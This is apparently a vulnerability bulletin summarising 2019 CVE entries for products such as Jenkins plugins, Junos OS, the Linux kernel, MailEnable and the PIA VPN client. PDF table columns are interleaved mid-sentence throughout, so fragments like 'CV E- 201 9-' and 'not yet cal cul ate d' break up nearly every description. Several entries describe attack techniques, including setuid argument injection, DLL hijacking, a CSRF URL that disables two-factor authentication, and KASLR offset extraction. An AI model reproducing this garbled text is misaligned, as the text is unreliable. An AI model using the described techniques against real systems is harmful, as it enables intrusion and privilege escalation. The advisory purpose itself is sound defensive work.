GLPI GLPI Product 9.3.1 is affected by: Frame and Form tags Injection allowing admins to phish users by putting code in CV reminder description. The E- impact is: Admins can phish any 201 user or group of users for not 9- credentials / credit cards. The 201 yet 101 component is: Tools > 9- cal glpi_project -- glpi 031 Reminder > Description .. Set 07- cul 0 the description to any 12 ate MIS iframe/form tags and apply. The d C attack vector is: The attacker MIS puts a login form, the user fills it C and clicks on submit .. the request is sent to the attacker domain saving the data. The fixed version is: 9.4.1.
CV E- 201 9- An issue was discovered in 132 GLPI before 9.4.1. After a not 40 successful password reset by a 201 yet MIS user, it is possible to change that 9- cal C glpi_project -- glpi user's password again during the 07- cul MIS next 24 hours without any 10 ate C information except the d MIS associated email address. C MIS C MIS C Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
HPE has identified a vulnerability in HPE 3PAR Service Processor (SP) version CV 4.1 through 4.4. HPE 3PAR E- not Service Processor (SP) version 201 201 yet 4.1 through 4.4 has a remote 9- hewlett_packard_enterprise 9- cal information disclosure 119 -- 3par_service_processor 07- cul vulnerability which can allow 91 09 ate for the disruption of the CO d confidentiality, integrity and NFI availability of the Service RM Processor and any managed 3PAR arrays.
There is a Factory Reset Protection (FRP) bypass vulnerability on several smartphones. The system does not sufficiently verify the permission, an attacker could do CV a certain operation on certain E- step of setup wizard. Successful not 201 exploit could allow the attacker 201 yet huawei -- 9- bypass the FRP protection. 9- cal mate_20_and_mate_20_X_h 522 Affected products: Mate 20 X, 07- cul onor_magic_2 0 versions earlier than Ever- 10 ate CO AL00B d NFI 9.0.0.200(C00E200R2P1); Mate RM 20, versions earlier than Hima- AL00B/Hima-TL00B 9.0.0.200(C00E200R2P1); Honor Magic 2, versions earlier than Tony-AL00B/Tony-TL00B 9.0.0.182(C00E180R2P2). Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
There is a path traversal vulnerability on Huawei Share. The software does not properly validate the path, an attacker could crafted a file path when CV transporting file through Huawei E- not Share, successful exploit could 201 201 yet allow the attacker to transport a 9- 9- cal huawei -- mate_20_x file to arbitrary path on the 522 07- cul phone. Affected products: Mate 1 10 ate 20 X versions earlier than Ever- CO d L29B NFI 9.1.0.300(C432E3R1P12), RM versions earlier than Ever-L29B 9.1.0.300(C636E3R2P1), and versions earlier than Ever-L29B 9.1.0.300(C185E3R3P1).
In Hunesion i-oneNet version 3.0.7 ~ 3.0.53 and 4.0.4 ~ CV 4.0.16, the specific upload web E- not module doesn't verify the file 201 201 yet extension and type, and an 9- 9- cal hunesion -- i-onenet attacker can upload a webshell. 128 07- cul After the webshell upload, an 03 10 ate attacker can use the webshell to CO d perform remote code exection NFI such as running a system RM command.
not CV In Hunesion i-oneNet version 201 yet E- 3.0.7 ~ 3.0.53 and 4.0.4 ~ 9- cal 201 hunesion -- i-onenet 4.0.16, due to the lack of update 07- cul 9- file integrity checking in the 10 ate 128 upgrade process, an attacker can d 04 Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
craft malicious file and use it as CO an update. NFI RM
CV E- IBM Content Navigator 3.0CD not 201 is vulnerable to local file 201 yet 9- inclusion, allowing an attacker 9- cal 426 ibm -- content_navigator to access a configuration file in 07- cul 3 the ICN server. IBM X-Force 11 ate XF ID: 160015. d CO NFI RM
CV E- IBM Security Identity Manager not 201 7.0.1 discloses sensitive 201 yet 8- information to unauthorized ibm -- 9- cal 196 users. The information can be security_identity_manager 07- cul 8 used to mount further attacks on 11 ate CO the system. IBM X-Force ID: d NFI 153749. RM XF
Improper access control in the CV Intel(R) Processor Diagnostic not E- Tool before version 4.1.2.24 201 yet 201 intel -- may allow an authenticated user 9- cal 9- processor_diagnostic_tool to potentially enable escalation 07- cul 111 of privilege, information 11 ate 33 disclosure or denial of service d BID via local access. CO Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
NFI RM
CV Improper authentication in E- firmware for Intel(R) SSD DC not 201 S4500 Series and Intel(R) SSD 201 yet 8- intel -- DC S4600 Series before 9- cal 180 ssd_dc_s4500_and_s4600_d SCV10150 may allow an 07- cul 95 evices unprivileged user to potentially 11 ate BID enable escalation of privilege d CO via physical access. NFI RM
CV E- not 201 201 yet 8- Intuit Lacerte 2017 has Incorrect 9- cal 148 intuit -- lacerte Access Control. 07- cul 33 09 ate MIS d C MIS C
CV not E- 201 yet 201 Invoxia NVX220 devices allow 9- cal 8- invoxia -- nvx220_devices TELNET access as admin with a 07- cul 145 default password. 05 ate 28 d MIS C Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
An issue was discovered in the CV Core Server in Ivanti Endpoint E- not Manager (EPM) 2017.3 before 201 201 yet SU7 and 2018.x before 2018.3 9- 9- cal ivanti -- endpoint_manager SU3, with remote code 106 07- cul execution. In other words, the 51 11 ate issue affects 2017.3, 2018.1, and CO d 2018.3 installations that lack the NFI April 2019 update. RM
CV E- Jenkins Port Allocator Plugin not 201 stores credentials unencrypted in 201 yet 9- job config.xml files on the 9- cal 103 jenkins -- jenkins Jenkins master where they can 07- cul 50 be viewed by users with 11 ate MLI Extended Read permission, or d ST access to the master file system. MIS C
CV E- A stored cross site scripting 201 vulnerability in Jenkins not 9- Dependency Graph Viewer 201 yet 103 Plugin 0.13 and earlier allowed 9- cal 49 jenkins -- jenkins attackers able to configure jobs 07- cul MIS in Jenkins to inject arbitrary 11 ate C HTML and JavaScript in the d MLI plugin-provided web pages in ST Jenkins. MIS C Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
CV E- Jenkins Gogs Plugin stored not 201 credentials unencrypted in job 201 yet 9- config.xml files on the Jenkins 9- cal 103 jenkins -- jenkins master where they can be 07- cul 48 viewed by users with Extended 11 ate MLI Read permission, or access to d ST the master file system. MIS C
CV E- Jenkins Mashup Portlets Plugin not 201 stored credentials unencrypted 201 yet 9- on the Jenkins master where 9- cal 103 jenkins -- jenkins they can be viewed by users 07- cul 47 with access to the master file 11 ate MLI system. d ST MIS C
CV E- A reflected cross site scripting not 201 vulnerability in Jenkins 201 yet 9- Embeddable Build Status Plugin 9- cal 103 jenkins -- jenkins 2.0.1 and earlier allowed 07- cul 46 attackers inject arbitrary HTML 11 ate MLI and JavaScript into the response d ST of this plugin. MIS C
A missing permission check in 201 not CV jenkins -- jenkins Jenkins Docker Plugin 1.1.6 and 9- yet E- Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
earlier in various 07- cal 201 'fillCredentialsIdItems' methods 11 cul 9- allowed users with Overall/Read ate 103 access to enumerate credentials d 42 ID of credentials stored in MLI Jenkins. ST MIS C
A missing permission check in CV Jenkins Docker Plugin 1.1.6 and E- earlier in not 201 DockerAPI.DescriptorImpl#doT 201 yet 9- estConnection allowed users 9- cal 103 jenkins -- jenkins with Overall/Read access to 07- cul 41 connect to an attacker-specified 11 ate MLI URL using attacker-specified d ST credentials IDs obtained through MIS another method, capturing C credentials stored in Jenkins.
A cross-site request forgery CV vulnerability in Jenkins Docker E- Plugin 1.1.6 and earlier in not 201 DockerAPI.DescriptorImpl#doT 201 yet 9- estConnection allowed users 9- cal 103 jenkins -- jenkins with Overall/Read access to 07- cul 40 connect to an attacker-specified 11 ate MLI URL using attacker-specified d ST credentials IDs obtained through MIS another method, capturing C credentials stored in Jenkins.
Jenkins Caliper CI Plugin stores 201 not CV jenkins -- jenkins credentials unencrypted in job 9- yet E- Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
config.xml files on the Jenkins 07- cal 201 master where they can be 11 cul 9- viewed by users with Extended ate 103 Read permission, or access to d 51 the master file system. MLI ST MIS C
A vulnerability in the pfe- chassisd Chassis Manager (CMLC) daemon of Juniper Networks Junos OS allows an attacker to cause a Denial of Service (DoS) to the EX4300 when specific valid broadcast packets create a broadcast storm condition when received on the me0 interface of the EX4300 CV Series device. A reboot of the E- not device is required to restore 201 201 yet service. Continued receipt of 9- 9- cal juniper -- junos_os these valid broadcast packets 004 07- cul will create a sustained Denial of 6 11 ate Service (DoS) against the CO d device. Affected releases are NFI Juniper Networks Junos OS: RM 16.1 versions above and including 16.1R1 prior to 16.1R7-S5; 17.1 versions prior to 17.1R3; 17.2 versions prior to 17.2R3; 17.3 versions prior to 17.3R3-S2; 17.4 versions prior to 17.4R2; 18.1 versions prior to 18.1R3; 18.2 versions prior to 18.2R2. Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
On EX4300 Series switches with TCAM optimization enabled, incoming multicast traffic matches an implicit loopback filter rule first, since it has high priority. This rule is meant for reserved multicast addresses 224.0.0.x, but incorrectly matches on 224.x.x.x. Due to this bug, when a firewall filter is applied on the loopback interface, other firewall filters might stop working for multicast traffic. CV The command 'show firewall E- filter' can be used to confirm not 201 whether the filter is working. 201 yet 9- This issue only affects the 9- cal juniper -- junos_os 004 EX4300 switch. No other 07- cul 8 products or platforms are 11 ate CO affected by this vulnerability. d NFI This issue affects: Juniper RM Networks Junos OS: 14.1X53 versions prior to 14.1X53-D51, 14.1X53-D115 on EX4300 Series; 17.1 versions prior to 17.1R3 on EX4300 Series; 17.2 versions prior to 17.2R3-S2 on EX4300 Series; 17.3 versions prior to 17.3R3-S3 on EX4300 Series; 17.4 versions prior to 17.4R2-S5, 17.4R3 on EX4300 Series; 18.1 versions prior to 18.1R3-S1 on EX4300 Series; 18.2 versions prior to 18.2R2 on EX4300 Series; 18.3 versions Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
prior to 18.3R2 on EX4300 Series.
On Junos devices with the BGP graceful restart helper mode enabled or the BGP graceful restart mechanism enabled, a certain sequence of BGP session restart on a remote peer that has the graceful restart mechanism enabled may cause the local routing protocol daemon (RPD) process to crash and restart. Repeated crashes of the RPD process can cause prolonged Denial of Service (DoS). CV Graceful restart helper mode for E- not BGP is enabled by default. No 201 201 yet other Juniper Networks products 9- 9- cal juniper -- junos_os or platforms are affected by this 004 07- cul issue. Affected releases are 9 11 ate Juniper Networks Junos OS: CO d 16.1 versions prior to 16.1R7- NFI S3; 16.2 versions prior to RM 16.2R2-S9; 17.1 versions prior to 17.1R3; 17.2 versions prior to 17.2R3; 17.2X75 versions prior to 17.2X75-D105; 17.3 versions prior to 17.3R3-S2; 17.4 versions prior to 17.4R1-S7, 17.4R2-S2, 17.4R3; 18.1 versions prior to 18.1R3-S2; 18.2 versions prior to 18.2R2; 18.2X75 versions prior to 18.2X75-D12, 18.2X75-D30; 18.3 versions prior to 18.3R1- Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
S4, 18.3R2. Junos OS releases prior to 16.1R1 are not affected.
The srxpfe process may crash on SRX Series services gateways when the UTM module processes a specific fragmented HTTP packet. The packet is misinterpreted as a regular TCP packet which causes the processor to crash. This issue affects all SRX Series platforms that support URL-Filtering and CV have web-filtering enabled. E- Affected releases are Juniper not 201 Networks Junos OS: 12.3X48 201 yet 9- versions prior to 12.3X48-D85 9- cal juniper -- junos_os 005 on SRX Series; 15.1X49 07- cul 2 versions prior to 15.1X49-D181, 11 ate CO 15.1X49-D190 on SRX Series; d NFI 17.3 versions on SRX Series; RM 17.4 versions prior to 17.4R1- S8, 17.4R2-S5, 17.4R3 on SRX Series; 18.1 versions prior to 18.1R3-S6 on SRX Series; 18.2 versions prior to 18.2R2-S1, 18.2R3 on SRX Series; 18.3 versions prior to 18.3R1-S2, 18.3R2 on SRX Series; 18.4 versions prior to 18.4R1-S1, 18.4R2 on SRX Series.
Insufficient validation of 201 not CV environment variables in the 9- yet E- juniper -- junos_os telnet client supplied in Junos 07- cal 201 OS can lead to stack-based 11 cul 9- Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
buffer overflows, which can be ate 005 exploited to bypass veriexec d 3 restrictions on Junos OS. A CO stack-based overflow is present NFI in the handling of environment RM variables when connecting via MIS the telnet client to remote telnet C servers. This issue only affects the telnet client ? accessible from the CLI or shell ? in Junos OS. Inbound telnet services are not affected by this issue. This issue affects: Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S13; 12.3X48 versions prior to 12.3X48-D80; 14.1X53 versions prior to 14.1X53-D130, 14.1X53-D49; 15.1 versions prior to 15.1F6-S12, 15.1R7-S4; 15.1X49 versions prior to 15.1X49-D170; 15.1X53 versions prior to 15.1X53-D237, 15.1X53-D496, 15.1X53-D591, 15.1X53-D69; 16.1 versions prior to 16.1R3-S11, 16.1R7-S4; 16.2 versions prior to 16.2R2- S9; 17.1 versions prior to 17.1R3; 17.2 versions prior to 17.2R1-S8, 17.2R2-S7, 17.2R3- S1; 17.3 versions prior to 17.3R3-S4; 17.4 versions prior to 17.4R1-S6, 17.4R2-S3, 17.4R3; 18.1 versions prior to 18.1R2-S4, 18.1R3-S3; 18.2 versions prior to 18.2R1-S5, 18.2R2-S2, 18.2R3; 18.2X75 versions prior to 18.2X75-D40; Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
18.3 versions prior to 18.3R1- S3, 18.3R2; 18.4 versions prior to 18.4R1-S2, 18.4R2.
CV E- not 201 201 yet Leanote prior to version 2.6 is 9- 9- cal leanote -- leanote affected by: Cross Site Scripting 101 07- cul (XSS). 000 11 ate 3 d MIS C
CV E- not 201 201 yet libpng before 1.6.32 does not 7- 9- cal libpng -- libpng properly check the length of 126 07- cul chunks against the user limit. 52 10 ate CO d NFI RM
In the Linux kernel before 5.1.7, CV a device can be tracked by an E- attacker using the IP ID values 201 not the kernel produces for 9- 201 yet connection-less protocols (e.g., 106 9- cal linux -- linux_kernel UDP and ICMP). When such 38 07- cul traffic is sent to multiple BID 05 ate destination IP addresses, it is MIS d possible to obtain hash C collisions (of indices to the MIS counter array) and thereby C Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
obtain the hashing key (via MIS enumeration). An attack may be C conducted by hosting a crafted MIS web page that uses WebRTC or C gQUIC to force UDP traffic to MIS attacker-controlled IP addresses. C MIS C MIS C MIS C
The Linux kernel 4.x (starting from 4.1) and 5.x before 5.0.8 allows Information Exposure (partial kernel address disclosure), leading to a KASLR CV bypass. Specifically, it is E- possible to extract the KASLR 201 kernel image offset using the IP 9- ID values the kernel produces not 106 for connection-less protocols 201 yet 39 (e.g., UDP and ICMP). When 9- cal MIS linux -- linux_kernel such traffic is sent to multiple 07- cul C destination IP addresses, it is 05 ate MIS possible to obtain hash d C collisions (of indices to the MIS counter array) and thereby C obtain the hashing key (via MIS enumeration). This key contains C enough bits from a kernel address (of a static variable) so when the key is extracted (via enumeration), the offset of the kernel image is exposed. This Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
attack can be carried out remotely, by the attacker forcing the target device to send UDP or ICMP (or certain other) traffic to attacker-controlled IP addresses. Forcing a server to send UDP traffic is trivial if the server is a DNS server. ICMP traffic is trivial if the server answers ICMP Echo requests (ping). For client targets, if the target visits the attacker's web page, then WebRTC or gQUIC can be used to force UDP traffic to attacker-controlled IP addresses. NOTE: this attack against KASLR became viable in 4.1 because IP ID generation was changed to have a dependency on an address associated with a network namespace.
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 CV for Linux could allow an not E- authenticated, local attacker to 201 yet 201 london_trust_media -- run arbitrary code with elevated 9- cal 9- private_internet_access_vpn privileges. The 07- cul 125 _client_for_linux openvpn_launcher.64 binary is 11 ate 78 setuid root. This binary executes d MIS /opt/pia/openvpn-64/openvpn, C passing the parameters provided from the command line. Care was taken to programmatically Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
disable potentially dangerous openvpn parameters; however, the --route-pre-down parameter can be used. This parameter accepts an arbitrary path to a script/program to be executed when OpenVPN exits. The -- script-security parameter also needs to be passed to allow for this action to be taken, and -- script-security is not currently in the disabled parameter list. A local unprivileged user can pass a malicious script/binary to the - -route-pre-down option, which will be executed as root when openvpn is stopped.
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for Linux could allow an authenticated, local attacker to CV run arbitrary code with elevated not E- privileges. The root_runner.64 201 yet 201 london_trust_media -- binary is setuid root. This binary 9- cal 9- private_internet_access_vpn executes /opt/pia/ruby/64/ruby, 07- cul 125 _client_for_linux which in turn attempts to load 11 ate 75 several libraries under d MIS /tmp/ruby-deploy.old/lib. A C local unprivileged user can create a malicious library under this path to execute arbitrary code as the root user. Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for Linux and macOS could allow an authenticated, local attacker to run arbitrary code with elevated privileges. The PIA Linux/macOS binary CV openvpn_launcher.64 binary is not E- setuid root. This binary accepts london_trust_media -- 201 yet 201 several parameters to update the private_internet_access_vpn 9- cal 9- system configuration. These _client_for_linux_and_maco 07- cul 125 parameters are passed to s 11 ate 79 operating system commands d MIS using a "here" document. The C parameters are not sanitized, which allow for arbitrary commands to be injected using shell metacharacters. A local unprivileged user can pass special crafted parameters that will be interpolated by the operating system calls.
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 CV for Linux and macOS could not E- london_trust_media -- allow an authenticated, local 201 yet 201 private_internet_access_vpn attacker to overwrite arbitrary 9- cal 9- _client_for_linux_and_maco files. The openvpn_launcher 07- cul 125 s binary is setuid root. This binary 11 ate 73 supports the --log option, which d MIS accepts a path as an argument. C This parameter is not sanitized, which allows a local Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
unprivileged user to overwrite arbitrary files owned by any user on the system, including root. This creates a denial of service condition and possible data loss if leveraged by a malicious local user.
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for macOS could allow an authenticated, local attacker to run arbitrary code with elevated privileges. The openvpn_launcher binary is CV setuid root. This program is not E- called during the connection 201 yet 201 london_trust_media -- process and executes several 9- cal 9- private_internet_access_vpn operating system utilities to 07- cul 125 _client_for_macos configure the system. The 11 ate 76 networksetup utility is called d MIS using relative paths. A local C unprivileged user can execute arbitrary commands as root by creating a networksetup trojan which will be executed during the connection process. This is possible because the PATH environment variable is not reset prior to executing the OS utility.
A vulnerability in the London 201 not CV london_trust_media -- Trust Media Private Internet 9- yet E- private_internet_access_vpn Access (PIA) VPN Client v0.9.8 07- cal 201 _client_for_macos beta (build 02099) for macOS 11 cul 9- Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
could allow an authenticated, ate 125 local attacker to overwrite d 71 arbitrary files. When the client MIS initiates a connection, the XML C /tmp/pia-watcher.plist file is created. If the file exists, it will be truncated and the contents completely overwritten. This file is removed on disconnect. An unprivileged user can create a hard or soft link to arbitrary files owned by any user on the system, including root. This creates a denial of service condition and possible data loss if leveraged by a malicious local user.
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for macOS could allow an authenticated, local attacker to run arbitrary code with elevated CV privileges. The macOS binary not E- openvpn_launcher.64 is setuid 201 yet 201 london_trust_media -- root. This binary creates 9- cal 9- private_internet_access_vpn /tmp/pia_upscript.sh when 07- cul 125 _client_for_macos executed. Because the file 11 ate 77 creation mask (umask) is not d MIS reset, the umask value is C inherited from the calling process. This value can be manipulated to cause the privileged binary to create files with world writable Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
permissions. A local unprivileged user can modify /tmp/pia_upscript.sh during the connect process to execute arbitrary code as the root user.
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v1.0 for Windows could allow an authenticated, local attacker to CV run arbitrary code with elevated not E- privileges. The PIA client is 201 yet 201 london_trust_media -- vulnerable to a DLL injection 9- cal 9- private_internet_access_vpn vulnerability during the software 07- cul 125 _client_for_windows update process. The updater 11 ate 74 loads several libraries from a d MIS folder that authenticated users C have write access to. A low privileged user can leverage this vulnerability to execute arbitrary code as SYSTEM.
MailEnable Enterprise Premium 10.23 was vulnerable to multiple CV directory traversal issues, with E- which authenticated users could 201 not add, remove, or potentially read 9- 201 yet mailenable -- files in arbitrary folders 129 9- cal mailenable_enterprise_prem accessible by the IIS user. This 25 07- cul ium could lead to reading other CO 08 ate users' credentials including NFI d those of SYSADMIN accounts, RM reading other users' emails, or MIS adding emails or files to other C users' accounts. Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
MailEnable Enterprise Premium 10.23 did not use appropriate CV access control checks in a E- number of areas. As a result, it 201 not was possible to perform a 9- 201 yet mailenable -- number of actions, when logged 129 9- cal mailenable_enterprise_prem in as a user, that that user should 26 07- cul ium not have had permission to CO 08 ate perform. It was also possible to NFI d gain access to areas within the RM application for which the MIS accounts used were supposed to C have insufficient access.
CV E- MailEnable Enterprise Premium 201 10.23 was vulnerable to stored not 9- and reflected cross-site scripting 201 yet mailenable -- 129 (XSS) attacks. Because the 9- cal mailenable_enterprise_prem 27 session cookie did not use the 07- cul ium CO HttpOnly flag, it was possible to 08 ate NFI hijack the session cookie by d RM exploiting this vulnerability. MIS C
MailEnable Enterprise Premium CV 10.23 was vulnerable to XML E- External Entity Injection (XXE) not 201 attacks that could be exploited 201 yet mailenable -- 9- by an unauthenticated user. It 9- cal mailenable_enterprise_prem 129 was possible for an attacker to 07- cul ium 24 use a vulnerability in the 08 ate CO configuration of the XML d NFI processor to read any file on the RM host system. Because all Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
credentials were stored in a MIS cleartext file, it was possible to C steal all users' credentials (including the highest privileged users).
In MailEnable Enterprise Premium 10.23, the potential cross-site request forgery CV (CSRF) protection mechanism E- was not implemented correctly 201 not and it was possible to bypass it 9- 201 yet mailenable -- by removing the anti-CSRF 129 9- cal mailenable_enterprise_prem token parameter from the 23 07- cul ium request. This could allow an CO 08 ate attacker to manipulate a user NFI d into unwittingly performing RM actions within the application MIS (such as sending email, adding C contacts, or changing settings) on behalf of the attacker.
CV not E- 201 yet 201 MatrixSSL before 4.2.1 has an 9- cal 9- matrixssl -- matrixssl out-of-bounds read during 07- cul 134 ASN.1 handling. 09 ate 70 d MIS C
In lib/mini_magick/image.rb in 201 not CV MiniMagick before 4.9.4, a 9- yet E- minimagick -- minmagick fetched remote image filename 07- cal 201 could cause remote command 11 cul 9- Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
execution because Image.open ate 135 input is directly passed to d 74 Kernel#open, which accepts a '|' MIS character followed by a C command. MIS C MIS C MIS C DE BIA N
In MobaXterm 11.1, the mobaxterm: URI handler has an argument injection vulnerability that allows remote attackers to CV execute arbitrary commands not E- when the user visits a specially 201 yet 201 crafted URL. Based on the 9- cal 9- mobatech -- mobaxterm available command-line 07- cul 134 arguments of the software, one 09 ate 75 can simply inject -exec to d MIS execute arbitrary commands. C The additional arguments - hideterm and -exitwhendone in the payload make the attack less visible.
An CSRF issue was discovered not CV in the JN-Jones MyBB-2FA 201 yet E- plugin through 2014-11-05 for 9- cal 201 mybb -- mybb MyBB. An attacker can forge a 07- cul 9- request to an installed mybb2fa 11 ate 123 plugin to control its state via d 63 Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
usercp.php?action=mybb2fa&do MIS =deactivate (or C usercp.php?action=mybb2fa&do MIS =activate). A deactivate C operation lowers the security of the targeted account by disabling two factor authentication.
CV A buffer overflow in iptables- E- restore in netfilter iptables 1.8.2 201 not allows an attacker to (at least) 9- 201 yet crash the program or potentially 113 9- cal netfilter -- iptables gain code execution via a 60 07- cul specially crafted iptables-save MIS 12 ate file. This is related to C d add_param_to_argv in CO xshared.c. NFI RM
CV E- not A potential Man in the Middle 201 201 yet netiq -- attack (MITM) was found in 9- 9- cal advanced_authentication_fra NetIQ Advanced Authentication 116 07- cul mework Framework versions prior to 50 10 ate 6.0. CO d NFI RM
201 not CV Path traversal vulnerability in 9- yet E- npmjs -- serve-here.js version up to v1.1.3 in serve- 07- cal 201 here.js npm module allows 10 cul 9- Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
attackers to list any file in ate 544 arbitrary folder. d 4 MIS C
CV E- 201 9- 135 06 not MIS @nuxt/devalue before 1.2.3, as 201 yet C used in Nuxt.js before 2.6.2, 9- cal MIS nuxt -- nuxt.js mishandles object keys, leading 07- cul C to XSS. 11 ate MIS d C MIS C MIS C MIS C
Sensitive passwords used in CV deployment and configuration of E- not oVirt Metrics, all versions. were 201 201 yet found to be insufficiently 9- 9- cal ovirt -- ovirt_metrics protected. Passwords could be 101 07- cul disclosed in log files (if 94 11 ate playbooks are run with -v) or in CO d playbooks stored on Metrics or NFI Bastion hosts. RM Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
CV E- 201 9- A Cross Site Scripting (XSS) 131 vulnerability exists in the 22 template tag used to render MIS message ids in Patchwork v1.1 not C through v2.1.x. This allows an 201 yet MLI attacker to insert JavaScript or 9- cal ST patchwork -- patchwork HTML into the patch detail page 07- cul MIS via an email sent to a mailing 10 ate C list consumed by Patchwork. d MIS This affects the function msgid C in templatetags/patch.py. MIS Patchwork versions v2.1.4 and C v2.0.4 will contain the fix. MIS C MIS C
main/streams/xp_socket.c in PHP 7.x before 2017-03-07 misparses fsockopen calls, such CV as by interpreting E- fsockopen('127.0.0.1:80', 443) not 201 as if the address/port were 201 yet 7- 127.0.0.1:80:443, which is later 9- cal 718 php -- php truncated to 127.0.0.1:80. This 07- cul 9 behavior has a security risk if 10 ate MIS the explicitly provided port d C number (i.e., 443 in this MIS example) is hardcoded into an C application as a security policy, but the hostname argument (i.e., Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
127.0.0.1:80 in this example) is obtained from untrusted input.
In PrestaShop before 1.7.6.0 CV RC2, the id_address_delivery E- and id_address_invoice not 201 parameters are affected by an 201 yet 9- Insecure Direct Object 9- cal 134 prestashop -- prestashop Reference vulnerability due to a 07- cul 61 guessable value sent to the web 09 ate MIS application during checkout. An d C attacker could leak personal MIS customer information. This is C PrestaShop bug #14444.
Multiple stored Cross-site CV scripting (XSS) issues in the not E- admin panel and survey system 201 yet 201 in REDCap 8 before 8.10.20 and 9- cal 9- project_redcap -- redcap 9 before 9.1.2 allow an attacker 07- cul 130 to inject arbitrary malicious 11 ate 29 HTML or JavaScript code into a d MIS user's web browser. C
http.cookiejar.DefaultPolicy.do CV main_return_ok in E- Lib/http/cookiejar.py in Python not 201 before 3.7.3 does not correctly 201 yet 8- validate the domain: it can be 9- cal 208 python -- python tricked into sending existing 07- cul 52 cookies to the wrong server. An 13 ate MIS attacker may abuse this flaw by d C using a server with a hostname MIS that has another valid hostname C as a suffix (e.g., Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
pythonicexample.com to steal cookies for example.com). When a program uses http.cookiejar.DefaultPolicy and tries to do an HTTP connection to an attacker-controlled server, existing cookies can be leaked to the attacker. This affects 2.x through 2.7.16, 3.x before 3.4.10, 3.5.x before 3.5.7, 3.6.x before 3.6.9, and 3.7.x before 3.7.3.
CV Quest KACE, all versions prior E- not to version 8.0.x, 8.1.x, and 201 201 yet 9.0.x, allows unintentional 9- 9- cal quest -- kace access to the appliance 109 07- cul leveraging functions of the 73 08 ate troubleshooting tools located in BID d the administrator user interface. MIS C
Rapid7 Insight Agent, version CV 2.6.3 and prior, suffers from a E- local privilege escalation due to 201 an uncontrolled DLL search 9- not path. Specifically, when Insight 562 201 yet Agent 2.6.3 and prior starts, the 9 9- cal rapid7 -- insight_agent Python interpreter attempts to MIS 07- cul load python3.dll at C 12 ate "C:\DLLs\python3.dll," which FU d normally is writable by locally LL authenticated users. Because of DIS this, a malicious local user could C use Insight Agent's startup MIS Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
conditions to elevate to C SYSTEM privileges. This issue CO was fixed in Rapid7 Insight NFI Agent 2.6.4. RM BU GT RA Q
The RzSurroundVADStreamingServ ice (RzSurroundVADStreamingSer CV vice.exe) in Razer Surround not E- 1.1.63.0 runs as the SYSTEM 201 yet 201 user using an executable located 9- cal 9- razor -- surround in 07- cul 131 %PROGRAMDATA%\Razer\S 09 ate 42 ynapse\Devices\Razer d MIS Surround\Driver\. The DACL C on this folder allows any user to overwrite contents of files in this folder, resulting in Elevation of Privilege.
CV Realization Concerto Critical not E- Chain Planner (aka CCPM) 201 yet 201 realization -- 5.10.8071 has SQL Injection in 9- cal 9- concerto_critical_chain_pla at least in the 07- cul 130 nner taskupdt/taskdetails.aspx 12 ate 27 webpage via the projectname d MIS parameter. C Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
A reflected XSS vulnerability exists in authorization flow of CV OpenShift Container Platform E- not versions: openshift-online-3, 201 201 yet red_hat -- openshift-enterprise-3.4 through 9- 9- cal openshift_container_platfor 3.7 and openshift-enterprise-3.9 388 07- cul m through 3.11. An attacker could 9 11 ate use this flaw to steal CO d authorization data by getting NFI them to click on a malicious RM link.
In Rockwell Automation PanelView 5510 (all versions manufactured before March 13, CV 2019 that have never been E- not updated to v4.003, v5.002, or 201 201 yet later), a remote, unauthenticated 9- rockwell_automation -- 9- cal threat actor with access to an 109 panelview_5510 07- cul affected PanelView 5510 70 11 ate Graphic Display, upon BID d successful exploit, may boot-up MIS the terminal and gain root-level C access to the device?s file system.
